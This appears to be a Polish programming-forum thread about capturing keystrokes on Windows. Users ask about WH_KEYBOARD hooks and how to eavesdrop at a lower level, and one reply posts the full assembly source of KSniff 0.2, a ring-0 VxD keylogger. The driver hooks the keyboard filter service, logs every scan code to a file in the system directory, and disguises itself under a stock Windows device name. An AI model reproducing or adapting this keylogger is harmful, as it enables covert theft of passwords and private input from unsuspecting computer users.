WH_KEYBOARD & WH_KEYBOARD_LL

arekit

Witam Wszystkich!!!

Kiedyś używałem do podsłuchu klawiatury Hook'a WH_KEYBOARD, niedawno odkryłem, że jest niby lepszy hook WH_KEYBOARD_LL. Ten nowy nie zwielokrotnia znaków z niektórych aplikacji (np. Word czy GG), ale powoduje, że np. z Buildera C++ nie można podsłuchać. Czy są jakieś inne hooki, które można by wykorzystać do tych czynności, a może są inne mechanizmy Windows, by zrobić to bardziej niskopoziomowo? Wydaje mi się, że na pewno dałoby się to zrobić będąc w ring0, ale na razie nie wiem, jak się za to wziąć, bo to już trzeba by wykorzystywać luki w systemie, a chciałem to zrobić jednak za pomocą dostępnych mechanizmów.

Pozdrawiam i dzięki za pomoc:)
Arek
 

saipix

No właśnie.
Mnie też to interesuje i chyba najniższym (czyt. najlepszym) poziomem będzie tutaj kod asemblera.
Nie znam się na asemblerze... może ktoś mógłby zapodać kod???
 

fl3a

;Oto plik sterownika z KSniff version 0.2, ring0 VxD keylogger'a:
;Jak ktoś ma coś więcej, to proszę o kontakt!
;A tu niespodzianka: //nieaktywny link
;może się przydać dociekliwym badaczom kodu ;-)
;Zapraszam do mojego tematu: Keyloggert->Keylogger - poziom
;systemowy

Kod:
.386p

;---------------------------------------------------------------------------;
; Includes                                                                  ;
;---------------------------------------------------------------------------;

INCLUDE VMM.INC
INCLUDE VKD.INC
INCLUDE IFSMGR.INC

;---------------------------------------------------------------------------;
; Some constants                                                            ;
;---------------------------------------------------------------------------;

; IFS.INC constants: function codes loaded into eax before each
; VxDCall IFSMgr_Ring0_FileIO below (open/create, size, write, close).

R0_OPENCREATFILE equ 0D500h
R0_GETFILESIZE   equ 0D800h
R0_WRITEFILE     equ 0D601h
R0_CLOSEFILE     equ 0D700h

;---------------------------------------------------------------------------;
; EBIOS_DDB                                                                 ;
;---------------------------------------------------------------------------;

; Device descriptor block.  Control_Proc (below) receives the VMM control
; messages.  NOTE(review): EBIOS / EBIOS_Device_ID are the identifiers of a
; stock Windows VxD; reusing them here is presumably deliberate, so a
; reader auditing loaded VxDs should not take the device name at face value.
Declare_Virtual_Device EBIOS, 1, 0, Control_Proc, EBIOS_Device_ID, SHELL_Init_Order+010000h, , ,



;---------------------------------------------------------------------------;

; Locked Data Segment******************************************************;

;---------------------------------------------------------------------------;



VxD_LOCKED_DATA_SEG

;---------------------------------------------------------------------------;
; Locked Code Segment (in the Locked Data Segment)                          ;
;---------------------------------------------------------------------------;

VxD_LOCKED_CODE_SEG

; All state below is kept in the locked (non-pageable) segment, as the
; keyboard hook runs at ring 0 and touches it directly.

Prev_Keyboard_Hook      dd 0            ; Addresses of previous service handlers
Disable                 db 0            ; set to 1 by Do_Device_Init on any failure

LogFileName             db 'ksniff.ax',0,0,0,0  ; pad out with zeroes to
                                                ; make hexedit possible
LFNLen                  EQU $-offset LogFileName ; name length incl. the zero padding
Root                    db ''           ; empty prefix used when the exec path is too long
LogFilePath             db 256 dup (0)  ; directory prefix + LogFileName, built in Do_Device_Init
LogFileHandle           dd 0            ; ring-0 file handle returned by R0_OPENCREATFILE
LogFileOffset           dd 0            ; next write position; starts at the file size

NewSessionID            db 0FFh         ; one-byte marker written at each Device_Init
ScanCode                db 0            ; staging byte for the value of cl in Keyboard_Hook

Busy                    db 0            ; re-entrancy guard for Keyboard_Hook



;---------------------------------------------------------------------------;

; Control Proc************************************************************ ;

;---------------------------------------------------------------------------;



BeginProc Control_Proc
        ; VxD control procedure: routes Device_Init to Do_Device_Init and
        ; System_Exit to Cleanup.  Any other message falls through to
        ; clc/ret, i.e. is acknowledged with CF clear (success).
        Control_Dispatch Device_Init, Do_Device_Init
        Control_Dispatch System_Exit, Cleanup
        clc
        ret
EndProc Control_Proc



;---------------------------------------------------------------------------;

; Main Proc****************************************************************;

;---------------------------------------------------------------------------;



BeginProc Do_Device_Init

        ; Device_Init handler.  Builds LogFilePath, opens/creates the log
        ; file, appends the session marker and installs Keyboard_Hook on the
        ; VKD_Filter_Keyboard_Input service.  Any failure jumps to Abort,
        ; which sets [Disable] so Keyboard_Hook becomes a pass-through.
        ; All registers and flags are preserved; CF is not used for status.

        pushfd                          ; save flags on stack
        pushad                          ; save registers on stack

        mov [Disable], 0                ; 0 means Init OK

        ; Get %WINDIR%\SYSTEM -- the code below uses ecx as the returned
        ; length and edx as the pointer (TODO confirm against Get_Exec_Path docs)

        VMMCall Get_Exec_Path
        cmp ecx, 256-LFNLen             ; if "%WINDIR%\SYSTEM" is too long,
        jbe Okay
        mov ecx, 1                      ; then just use "" (Root)
        mov esi, OFFSET32 Root
        jmp Useroot
Okay:
        mov esi, edx
Useroot:
        mov edi, OFFSET32 LogFilePath
        cld
        rep movsb                       ; LogFilePath = directory prefix
        mov esi, OFFSET32 LogFileName
        mov ecx, [LFNLen]
        rep movsb                       ; append file name plus its zero padding

        ; Create and open logfile

        mov eax, R0_OPENCREATFILE
        mov ebx, 2                      ; Flags
        mov ecx, 0                      ; Attributes
        mov edx, 0011h                  ; Action (presumably open-if-exists / create-if-absent -- verify)
        mov esi, OFFSET32 LogFilePath
        VxDCall IFSMgr_Ring0_FileIO
        jc Abort                        ; CF set = file service failed
        mov LogFileHandle, eax

        ; Set our pointer to the end of the file

        mov eax, R0_GETFILESIZE
        mov ebx, [LogFileHandle]
        VxDCall IFSMgr_Ring0_FileIO
        jc Abort
        mov [LogFileOffset], eax        ; next write goes at the current file size (append)

        ; Write NEW SESSION ID (byte 0FFh) to logfile

        mov eax, R0_WRITEFILE
        mov ebx, [LogFileHandle]
        mov ecx, 1                      ; Number of bytes to write
        mov edx, [LogFileOffset]
        mov esi, OFFSET32 NewSessionID
        VxDCall IFSMgr_Ring0_FileIO     ; return status is not checked here

        inc LogFileOffset

        ; Hook keyboard service

        GetVxDServiceOrdinal eax, VKD_Filter_Keyboard_Input
        mov esi, OFFSET32 Keyboard_Hook
        VMMcall Hook_Device_Service
        jc Abort
        mov [Prev_Keyboard_Hook], esi   ; previous handler, chained to by Keyboard_Hook

        jmp Device_Init_End

Abort:
        mov [Disable], 1                ; disable hook operation

Device_Init_End:
        popad                           ; restore registers on stack
        popfd                           ; restore flags on stack

        ret

EndProc Do_Device_Init



;---------------------------------------------------------------------------;

; Cleanup Proc**********************************************************************;

;---------------------------------------------------------------------------;



BeginProc Cleanup

        ; System_Exit handler: closes the log file.  The keyboard service
        ; hook is not removed here (see the author's note below).

        ; VKD_Keyboard_Input_Filter service unhook code should be here

        mov eax, R0_CLOSEFILE
        mov ebx, [LogFileHandle]
        VxDCall IFSMgr_Ring0_FileIO     ; return status is not checked

        ret

EndProc Cleanup



;---------------------------------------------------------------------------;

; VKD_Filter_Keyboard_Input hook procedure****************************************** ;

;---------------------------------------------------------------------------;



BeginProc Keyboard_Hook, HOOK_PROC, Prev_Keyboard_Hook, LOCKED

        ; Hook procedure for VKD_Filter_Keyboard_Input.  The byte in cl is
        ; written to the log file at LogFileOffset, then control chains to
        ; the previous handler.  [Busy] is a re-entrancy guard: a nested
        ; invocation returns immediately with CF set and does NOT chain.
        ; Otherwise registers/flags are preserved and CF is cleared before
        ; chaining.

        cmp [Busy], 0                   ; re-entrancy guard (author's "BUGFIX")
        jz EverythingOkay
        stc                             ; CF set: skip this key

        ;jmp [Prev_Keyboard_Hook]

        ret                             ; don't jump to previous hook, return

EverythingOkay:

        mov [Busy], 1

        pushad
        pushfd

        cmp [Disable], 0                ; Is hook operation disabled?
        jnz Keyboard_Hook_End           ; init failed: pass through untouched

        ;cmp cl, 03Fh                   ; Filter out <F5> (SoftIce)
        ;jz Keyboard_Hook_End
        ;cmp cl, 0BFh
        ;jz Keyboard_Hook_End

        mov [ScanCode], cl              ; presumably the raw scan code -- verify against VKD.INC

        mov eax, R0_WRITEFILE
        mov ebx, [LogFileHandle]
        mov ecx, 1                      ; Number of bytes to write
        mov edx, [LogFileOffset]
        mov esi, OFFSET32 ScanCode
        VxDCall IFSMgr_Ring0_FileIO     ; return status is not checked

        inc LogFileOffset

Keyboard_Hook_End:

        popfd
        popad

        mov [Busy], 0

        clc

        jmp [Prev_Keyboard_Hook]        ; Chain to previous hook

EndProc Keyboard_Hook



VxD_LOCKED_CODE_ENDS                    ; close the code segment opened inside the locked data segment

VxD_LOCKED_DATA_ENDS

        END
 